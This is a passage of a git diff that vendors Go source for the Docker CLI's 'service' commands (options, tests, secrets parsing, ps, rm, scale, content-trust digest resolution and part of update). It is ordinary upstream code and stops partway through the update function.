logDriverOptions{opts: opts.NewListOpts(runconfigopts.ValidateEnv)} +} + +func (ldo *logDriverOptions) toLogDriver() *swarm.Driver { + if ldo.name == "" { + return nil + } + + // set the log driver only if specified. + return &swarm.Driver{ + Name: ldo.name, + Options: runconfigopts.ConvertKVStringsToMap(ldo.opts.GetAll()), + } +} + +type healthCheckOptions struct { + cmd string + interval PositiveDurationOpt + timeout PositiveDurationOpt + retries int + noHealthcheck bool +} + +func (opts *healthCheckOptions) toHealthConfig() (*container.HealthConfig, error) { + var healthConfig *container.HealthConfig + haveHealthSettings := opts.cmd != "" || + opts.interval.Value() != nil || + opts.timeout.Value() != nil || + opts.retries != 0 + if opts.noHealthcheck { + if haveHealthSettings { + return nil, fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) + } + healthConfig = &container.HealthConfig{Test: []string{"NONE"}} + } else if haveHealthSettings { + var test []string + if opts.cmd != "" { + test = []string{"CMD-SHELL", opts.cmd} + } + var interval, timeout time.Duration + if ptr := opts.interval.Value(); ptr != nil { + interval = *ptr + } + if ptr := opts.timeout.Value(); ptr != nil { + timeout = *ptr + } + healthConfig = &container.HealthConfig{ + Test: test, + Interval: interval, + Timeout: timeout, + Retries: opts.retries, + } + } + return healthConfig, nil +} + +// ValidatePort validates a string is in the expected format for a port definition +func ValidatePort(value string) (string, error) { + portMappings, err := nat.ParsePortSpec(value) + for _, portMapping := range portMappings { + if portMapping.Binding.HostIP != "" { + return "", fmt.Errorf("HostIP is not supported by a service.") + } + } + return value, err +} + +// convertExtraHostsToSwarmHosts converts an array of extra hosts in cli +// : +// into a swarmkit host format: +// IP_address canonical_hostname [aliases...] +// This assumes input value (:) has already been validated +func convertExtraHostsToSwarmHosts(extraHosts []string) []string { + hosts := []string{} + for _, extraHost := range extraHosts { + parts := strings.SplitN(extraHost, ":", 2) + hosts = append(hosts, fmt.Sprintf("%s %s", parts[1], parts[0])) + } + return hosts +} + +type serviceOptions struct { + name string + labels opts.ListOpts + containerLabels opts.ListOpts + image string + args []string + hostname string + env opts.ListOpts + envFile opts.ListOpts + workdir string + user string + groups opts.ListOpts + tty bool + mounts opts.MountOpt + dns opts.ListOpts + dnsSearch opts.ListOpts + dnsOption opts.ListOpts + hosts opts.ListOpts + + resources resourceOptions + stopGrace DurationOpt + + replicas Uint64Opt + mode string + + restartPolicy restartPolicyOptions + constraints opts.ListOpts + update updateOptions + networks opts.ListOpts + endpoint endpointOptions + + registryAuth bool + + logDriver logDriverOptions + + healthcheck healthCheckOptions + secrets opts.SecretOpt +} + +func newServiceOptions() *serviceOptions { + return &serviceOptions{ + labels: opts.NewListOpts(runconfigopts.ValidateEnv), + constraints: opts.NewListOpts(nil), + containerLabels: opts.NewListOpts(runconfigopts.ValidateEnv), + env: opts.NewListOpts(runconfigopts.ValidateEnv), + envFile: opts.NewListOpts(nil), + groups: opts.NewListOpts(nil), + logDriver: newLogDriverOptions(), + dns: opts.NewListOpts(opts.ValidateIPAddress), + dnsOption: opts.NewListOpts(nil), + dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), + hosts: opts.NewListOpts(runconfigopts.ValidateExtraHost), + networks: opts.NewListOpts(nil), + } +} + +func (opts *serviceOptions) ToService() (swarm.ServiceSpec, error) { + var service swarm.ServiceSpec + + envVariables, err := runconfigopts.ReadKVStrings(opts.envFile.GetAll(), opts.env.GetAll()) + if err != nil { + return service, err + } + + currentEnv := make([]string, 0, len(envVariables)) + for _, env := range envVariables { // need to process each var, in order + k := strings.SplitN(env, "=", 2)[0] + for i, current := range currentEnv { // remove duplicates + if current == env { + continue // no update required, may hide this behind flag to preserve order of envVariables + } + if strings.HasPrefix(current, k+"=") { + currentEnv = append(currentEnv[:i], currentEnv[i+1:]...) + } + } + currentEnv = append(currentEnv, env) + } + + service = swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: opts.name, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: opts.image, + Args: opts.args, + Env: currentEnv, + Hostname: opts.hostname, + Labels: runconfigopts.ConvertKVStringsToMap(opts.containerLabels.GetAll()), + Dir: opts.workdir, + User: opts.user, + Groups: opts.groups.GetAll(), + TTY: opts.tty, + Mounts: opts.mounts.Value(), + DNSConfig: &swarm.DNSConfig{ + Nameservers: opts.dns.GetAll(), + Search: opts.dnsSearch.GetAll(), + Options: opts.dnsOption.GetAll(), + }, + Hosts: convertExtraHostsToSwarmHosts(opts.hosts.GetAll()), + StopGracePeriod: opts.stopGrace.Value(), + Secrets: nil, + }, + Networks: convertNetworks(opts.networks.GetAll()), + Resources: opts.resources.ToResourceRequirements(), + RestartPolicy: opts.restartPolicy.ToRestartPolicy(), + Placement: &swarm.Placement{ + Constraints: opts.constraints.GetAll(), + }, + LogDriver: opts.logDriver.toLogDriver(), + }, + Networks: convertNetworks(opts.networks.GetAll()), + Mode: swarm.ServiceMode{}, + UpdateConfig: &swarm.UpdateConfig{ + Parallelism: opts.update.parallelism, + Delay: opts.update.delay, + Monitor: opts.update.monitor, + FailureAction: opts.update.onFailure, + MaxFailureRatio: opts.update.maxFailureRatio.Value(), + }, + EndpointSpec: opts.endpoint.ToEndpointSpec(), + } + + healthConfig, err := opts.healthcheck.toHealthConfig() + if err != nil { + return service, err + } + service.TaskTemplate.ContainerSpec.Healthcheck = healthConfig + + switch opts.mode { + case "global": + if opts.replicas.Value() != nil { + return service, fmt.Errorf("replicas can only be used with replicated mode") + } + + service.Mode.Global = &swarm.GlobalService{} + case "replicated": + service.Mode.Replicated = &swarm.ReplicatedService{ + Replicas: opts.replicas.Value(), + } + default: + return service, fmt.Errorf("Unknown mode: %s", opts.mode) + } + return service, nil +} + +// addServiceFlags adds all flags that are common to both `create` and `update`. +// Any flags that are not common are added separately in the individual command +func addServiceFlags(cmd *cobra.Command, opts *serviceOptions) { + flags := cmd.Flags() + + flags.StringVarP(&opts.workdir, flagWorkdir, "w", "", "Working directory inside the container") + flags.StringVarP(&opts.user, flagUser, "u", "", "Username or UID (format: [:])") + flags.StringVar(&opts.hostname, flagHostname, "", "Container hostname") + + flags.Var(&opts.resources.limitCPU, flagLimitCPU, "Limit CPUs") + flags.Var(&opts.resources.limitMemBytes, flagLimitMemory, "Limit Memory") + flags.Var(&opts.resources.resCPU, flagReserveCPU, "Reserve CPUs") + flags.Var(&opts.resources.resMemBytes, flagReserveMemory, "Reserve Memory") + flags.Var(&opts.stopGrace, flagStopGracePeriod, "Time to wait before force killing a container (ns|us|ms|s|m|h)") + + flags.Var(&opts.replicas, flagReplicas, "Number of tasks") + + flags.StringVar(&opts.restartPolicy.condition, flagRestartCondition, "", "Restart when condition is met (none, on-failure, or any)") + flags.Var(&opts.restartPolicy.delay, flagRestartDelay, "Delay between restart attempts (ns|us|ms|s|m|h)") + flags.Var(&opts.restartPolicy.maxAttempts, flagRestartMaxAttempts, "Maximum number of restarts before giving up") + flags.Var(&opts.restartPolicy.window, flagRestartWindow, "Window used to evaluate the restart policy (ns|us|ms|s|m|h)") + + flags.Uint64Var(&opts.update.parallelism, flagUpdateParallelism, 1, "Maximum number of tasks updated simultaneously (0 to update all at once)") + flags.DurationVar(&opts.update.delay, flagUpdateDelay, time.Duration(0), "Delay between updates (ns|us|ms|s|m|h) (default 0s)") + flags.DurationVar(&opts.update.monitor, flagUpdateMonitor, time.Duration(0), "Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)") + flags.StringVar(&opts.update.onFailure, flagUpdateFailureAction, "pause", "Action on update failure (pause|continue)") + flags.Var(&opts.update.maxFailureRatio, flagUpdateMaxFailureRatio, "Failure rate to tolerate during an update") + + flags.StringVar(&opts.endpoint.mode, flagEndpointMode, "", "Endpoint mode (vip or dnsrr)") + + flags.BoolVar(&opts.registryAuth, flagRegistryAuth, false, "Send registry authentication details to swarm agents") + + flags.StringVar(&opts.logDriver.name, flagLogDriver, "", "Logging driver for service") + flags.Var(&opts.logDriver.opts, flagLogOpt, "Logging driver options") + + flags.StringVar(&opts.healthcheck.cmd, flagHealthCmd, "", "Command to run to check health") + flags.Var(&opts.healthcheck.interval, flagHealthInterval, "Time between running the check (ns|us|ms|s|m|h)") + flags.Var(&opts.healthcheck.timeout, flagHealthTimeout, "Maximum time to allow one check to run (ns|us|ms|s|m|h)") + flags.IntVar(&opts.healthcheck.retries, flagHealthRetries, 0, "Consecutive failures needed to report unhealthy") + flags.BoolVar(&opts.healthcheck.noHealthcheck, flagNoHealthcheck, false, "Disable any container-specified HEALTHCHECK") + + flags.BoolVarP(&opts.tty, flagTTY, "t", false, "Allocate a pseudo-TTY") +} + +const ( + flagConstraint = "constraint" + flagConstraintRemove = "constraint-rm" + flagConstraintAdd = "constraint-add" + flagContainerLabel = "container-label" + flagContainerLabelRemove = "container-label-rm" + flagContainerLabelAdd = "container-label-add" + flagDNS = "dns" + flagDNSRemove = "dns-rm" + flagDNSAdd = "dns-add" + flagDNSOption = "dns-option" + flagDNSOptionRemove = "dns-option-rm" + flagDNSOptionAdd = "dns-option-add" + flagDNSSearch = "dns-search" + flagDNSSearchRemove = "dns-search-rm" + flagDNSSearchAdd = "dns-search-add" + flagEndpointMode = "endpoint-mode" + flagHost = "host" + flagHostAdd = "host-add" + flagHostRemove = "host-rm" + flagHostname = "hostname" + flagEnv = "env" + flagEnvFile = "env-file" + flagEnvRemove = "env-rm" + flagEnvAdd = "env-add" + flagGroup = "group" + flagGroupAdd = "group-add" + flagGroupRemove = "group-rm" + flagLabel = "label" + flagLabelRemove = "label-rm" + flagLabelAdd = "label-add" + flagLimitCPU = "limit-cpu" + flagLimitMemory = "limit-memory" + flagMode = "mode" + flagMount = "mount" + flagMountRemove = "mount-rm" + flagMountAdd = "mount-add" + flagName = "name" + flagNetwork = "network" + flagPublish = "publish" + flagPublishRemove = "publish-rm" + flagPublishAdd = "publish-add" + flagReplicas = "replicas" + flagReserveCPU = "reserve-cpu" + flagReserveMemory = "reserve-memory" + flagRestartCondition = "restart-condition" + flagRestartDelay = "restart-delay" + flagRestartMaxAttempts = "restart-max-attempts" + flagRestartWindow = "restart-window" + flagStopGracePeriod = "stop-grace-period" + flagTTY = "tty" + flagUpdateDelay = "update-delay" + flagUpdateFailureAction = "update-failure-action" + flagUpdateMaxFailureRatio = "update-max-failure-ratio" + flagUpdateMonitor = "update-monitor" + flagUpdateParallelism = "update-parallelism" + flagUser = "user" + flagWorkdir = "workdir" + flagRegistryAuth = "with-registry-auth" + flagLogDriver = "log-driver" + flagLogOpt = "log-opt" + flagHealthCmd = "health-cmd" + flagHealthInterval = "health-interval" + flagHealthRetries = "health-retries" + flagHealthTimeout = "health-timeout" + flagNoHealthcheck = "no-healthcheck" + flagSecret = "secret" + flagSecretAdd = "secret-add" + flagSecretRemove = "secret-rm" +) diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go b/vendor/github.com/docker/docker/cli/command/service/opts_test.go new file mode 100644 index 0000000000..78b956ad67 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/opts_test.go @@ -0,0 +1,107 @@ +package service + +import ( + "reflect" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestMemBytesString(t *testing.T) { + var mem memBytes = 1048576 + assert.Equal(t, mem.String(), "1 MiB") +} + +func TestMemBytesSetAndValue(t *testing.T) { + var mem memBytes + assert.NilError(t, mem.Set("5kb")) + assert.Equal(t, mem.Value(), int64(5120)) +} + +func TestNanoCPUsString(t *testing.T) { + var cpus opts.NanoCPUs = 6100000000 + assert.Equal(t, cpus.String(), "6.100") +} + +func TestNanoCPUsSetAndValue(t *testing.T) { + var cpus opts.NanoCPUs + assert.NilError(t, cpus.Set("0.35")) + assert.Equal(t, cpus.Value(), int64(350000000)) +} + +func TestDurationOptString(t *testing.T) { + dur := time.Duration(300 * 10e8) + duration := DurationOpt{value: &dur} + assert.Equal(t, duration.String(), "5m0s") +} + +func TestDurationOptSetAndValue(t *testing.T) { + var duration DurationOpt + assert.NilError(t, duration.Set("300s")) + assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) + assert.NilError(t, duration.Set("-300s")) + assert.Equal(t, *duration.Value(), time.Duration(-300*10e8)) +} + +func TestPositiveDurationOptSetAndValue(t *testing.T) { + var duration PositiveDurationOpt + assert.NilError(t, duration.Set("300s")) + assert.Equal(t, *duration.Value(), time.Duration(300*10e8)) + assert.Error(t, duration.Set("-300s"), "cannot be negative") +} + +func TestUint64OptString(t *testing.T) { + value := uint64(2345678) + opt := Uint64Opt{value: &value} + assert.Equal(t, opt.String(), "2345678") + + opt = Uint64Opt{} + assert.Equal(t, opt.String(), "") +} + +func TestUint64OptSetAndValue(t *testing.T) { + var opt Uint64Opt + assert.NilError(t, opt.Set("14445")) + assert.Equal(t, *opt.Value(), uint64(14445)) +} + +func TestHealthCheckOptionsToHealthConfig(t *testing.T) { + dur := time.Second + opt := healthCheckOptions{ + cmd: "curl", + interval: PositiveDurationOpt{DurationOpt{value: &dur}}, + timeout: PositiveDurationOpt{DurationOpt{value: &dur}}, + retries: 10, + } + config, err := opt.toHealthConfig() + assert.NilError(t, err) + assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ + Test: []string{"CMD-SHELL", "curl"}, + Interval: time.Second, + Timeout: time.Second, + Retries: 10, + }), true) +} + +func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) { + opt := healthCheckOptions{ + noHealthcheck: true, + } + config, err := opt.toHealthConfig() + assert.NilError(t, err) + assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{ + Test: []string{"NONE"}, + }), true) +} + +func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) { + opt := healthCheckOptions{ + cmd: "curl", + noHealthcheck: true, + } + _, err := opt.toHealthConfig() + assert.Error(t, err, "--no-healthcheck conflicts with --health-* options") +} diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go new file mode 100644 index 0000000000..ce9b454edd --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/parse.go @@ -0,0 +1,68 @@ +package service + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +// ParseSecrets retrieves the secrets from the requested names and converts +// them to secret references to use with the spec +func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) { + secretRefs := make(map[string]*swarmtypes.SecretReference) + ctx := context.Background() + + for _, secret := range requestedSecrets { + if _, exists := secretRefs[secret.Target]; exists { + return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source) + } + secretRef := &swarmtypes.SecretReference{ + File: &swarmtypes.SecretReferenceFileTarget{ + Name: secret.Target, + UID: secret.UID, + GID: secret.GID, + Mode: secret.Mode, + }, + SecretName: secret.Source, + } + + secretRefs[secret.Target] = secretRef + } + + args := filters.NewArgs() + for _, s := range secretRefs { + args.Add("names", s.SecretName) + } + + secrets, err := client.SecretList(ctx, types.SecretListOptions{ + Filters: args, + }) + if err != nil { + return nil, err + } + + foundSecrets := make(map[string]string) + for _, secret := range secrets { + foundSecrets[secret.Spec.Annotations.Name] = secret.ID + } + + addedSecrets := []*swarmtypes.SecretReference{} + + for _, ref := range secretRefs { + id, ok := foundSecrets[ref.SecretName] + if !ok { + return nil, fmt.Errorf("secret not found: %s", ref.SecretName) + } + + // set the id for the ref to properly assign in swarm + // since swarm needs the ID instead of the name + ref.SecretID = id + addedSecrets = append(addedSecrets, ref) + } + + return addedSecrets, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go new file mode 100644 index 0000000000..cf94ad7374 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/ps.go @@ -0,0 +1,76 @@ +package service + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/node" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type psOptions struct { + serviceID string + quiet bool + noResolve bool + noTrunc bool + filter opts.FilterOpt +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] SERVICE", + Short: "List the tasks of a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.serviceID = args[0] + return runPS(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPS(dockerCli *command.DockerCli, opts psOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID) + if err != nil { + return err + } + + filter := opts.filter.Value() + filter.Add("service", service.ID) + if filter.Include("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + nodeReference, err := node.Reference(ctx, client, nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", nodeReference) + } + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + return err + } + + if opts.quiet { + return task.PrintQuiet(dockerCli, tasks) + } + return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go new file mode 100644 index 0000000000..c3fbbabbca --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/remove.go @@ -0,0 +1,47 @@ +package service + +import ( + "fmt" + "strings" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + + cmd := &cobra.Command{ + Use: "rm SERVICE [SERVICE...]", + Aliases: []string{"remove"}, + Short: "Remove one or more services", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args) + }, + } + cmd.Flags() + + return cmd +} + +func runRemove(dockerCli *command.DockerCli, sids []string) error { + client := dockerCli.Client() + + ctx := context.Background() + + var errs []string + for _, sid := range sids { + err := client.ServiceRemove(ctx, sid) + if err != nil { + errs = append(errs, err.Error()) + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", sid) + } + if len(errs) > 0 { + return fmt.Errorf(strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go new file mode 100644 index 0000000000..cf89e90273 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/scale.go @@ -0,0 +1,96 @@ +package service + +import ( + "fmt" + "strconv" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command { + return &cobra.Command{ + Use: "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]", + Short: "Scale one or multiple replicated services", + Args: scaleArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runScale(dockerCli, args) + }, + } +} + +func scaleArgs(cmd *cobra.Command, args []string) error { + if err := cli.RequiresMinArgs(1)(cmd, args); err != nil { + return err + } + for _, arg := range args { + if parts := strings.SplitN(arg, "=", 2); len(parts) != 2 { + return fmt.Errorf( + "Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage: %s\n\n%s", + arg, + cmd.CommandPath(), + cmd.UseLine(), + cmd.Short, + ) + } + } + return nil +} + +func runScale(dockerCli *command.DockerCli, args []string) error { + var errors []string + for _, arg := range args { + parts := strings.SplitN(arg, "=", 2) + serviceID, scaleStr := parts[0], parts[1] + + // validate input arg scale number + scale, err := strconv.ParseUint(scaleStr, 10, 64) + if err != nil { + errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err)) + continue + } + + if err := runServiceScale(dockerCli, serviceID, scale); err != nil { + errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err)) + } + } + + if len(errors) == 0 { + return nil + } + return fmt.Errorf(strings.Join(errors, "\n")) +} + +func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error { + client := dockerCli.Client() + ctx := context.Background() + + service, _, err := client.ServiceInspectWithRaw(ctx, serviceID) + if err != nil { + return err + } + + serviceMode := &service.Spec.Mode + if serviceMode.Replicated == nil { + return fmt.Errorf("scale can only be used with replicated mode") + } + + serviceMode.Replicated.Replicas = &scale + + response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go new file mode 100644 index 0000000000..052d49c32a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/trust.go @@ -0,0 +1,96 @@ +package service + +import ( + "encoding/hex" + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/trust" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/notary/tuf/data" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error { + if !command.IsTrusted() { + // Digests are resolved by the daemon when not using content + // trust. + return nil + } + + image := service.TaskTemplate.ContainerSpec.Image + + // We only attempt to resolve the digest if the reference + // could be parsed as a digest reference. Specifying an image ID + // is valid but not resolvable. There is no warning message for + // an image ID because it's valid to use one. + if _, err := digest.ParseDigest(image); err == nil { + return nil + } + + ref, err := reference.ParseNamed(image) + if err != nil { + return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image) + } + if _, ok := ref.(reference.Canonical); !ok { + ref = reference.WithDefaultTag(ref) + + taggedRef, ok := ref.(reference.NamedTagged) + if !ok { + // This should never happen because a reference either + // has a digest, or WithDefaultTag would give it a tag. + return errors.New("Failed to resolve image digest using content trust: reference is missing a tag") + } + + resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef) + if err != nil { + return fmt.Errorf("Failed to resolve image digest using content trust: %v", err) + } + logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String()) + service.TaskTemplate.ContainerSpec.Image = resolvedImage.String() + } + return nil +} + +func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) { + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return nil, err + } + + authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) + + notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") + if err != nil { + return nil, errors.Wrap(err, "error establishing connection to trust repository") + } + + t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) + if err != nil { + return nil, trust.NotaryError(repoInfo.FullName(), err) + } + // Only get the tag if it's in the top level targets role or the releases delegation role + // ignore it if it's in any other delegation roles + if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { + return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String())) + } + + logrus.Debugf("retrieving target for %s role\n", t.Role) + h, ok := t.Hashes["sha256"] + if !ok { + return nil, errors.New("no valid hash, expecting sha256") + } + + dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h)) + + // Using distribution reference package to make sure that adding a + // digest does not erase the tag. When the two reference packages + // are unified, this will no longer be an issue. + return distreference.WithDigest(ref, dgst) +} diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go new file mode 100644 index 0000000000..d56de10913 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/update.go @@ -0,0 +1,849 @@ +package service + +import ( + "fmt" + "sort" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + shlex "github.com/flynn-archive/go-shlex" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + serviceOpts := newServiceOptions() + + cmd := &cobra.Command{ + Use: "update [OPTIONS] SERVICE", + Short: "Update a service", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), args[0]) + }, + } + + flags := cmd.Flags() + flags.String("image", "", "Service image tag") + flags.String("args", "", "Service command args") + flags.Bool("rollback", false, "Rollback to previous specification") + flags.Bool("force", false, "Force update even if no changes require it") + addServiceFlags(cmd, serviceOpts) + + flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable") + flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container") + flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key") + flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key") + flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path") + // flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port") + flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port") + flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint") + flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server") + flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option") + flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain") + flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)") + flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label") + flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label") + flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable") + flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret") + flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service") + flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service") + flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint") + flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port") + flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container") + flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server") + flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option") + flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain") + flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)") + + return cmd +} + +func newListOptsVar() *opts.ListOpts { + return opts.NewListOptsRef(&[]string{}, nil) +} + +func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error { + apiClient := dockerCli.Client() + ctx := context.Background() + updateOpts := types.ServiceUpdateOptions{} + + service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID) + if err != nil { + return err + } + + rollback, err := flags.GetBool("rollback") + if err != nil { + return err + } + + spec := &service.Spec + if rollback { + spec = service.PreviousSpec + if spec == nil { + return fmt.Errorf("service does not have a previous specification to roll back to") + } + } + + err = updateService(flags, spec) + if err != nil { + return err + } + + if flags.Changed("image") { + if err := resolveServiceImageDigest(dockerCli, spec); err != nil { + return err + } + } + + updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets) + if err != nil { + return err + } + + spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets + + // only send auth if flag was set + sendAuth, err := flags.GetBool(flagRegistryAuth) + if err != nil { + return err + } + if sendAuth { + // Retrieve encoded auth token from the image reference + // This would be the old image if it didn't change in this update + image := spec.TaskTemplate.ContainerSpec.Image + encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) + if err != nil { + return err + } + updateOpts.EncodedRegistryAuth = encodedAuth + } else if rollback { + updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec + } else { + updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec + } + + response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID) + 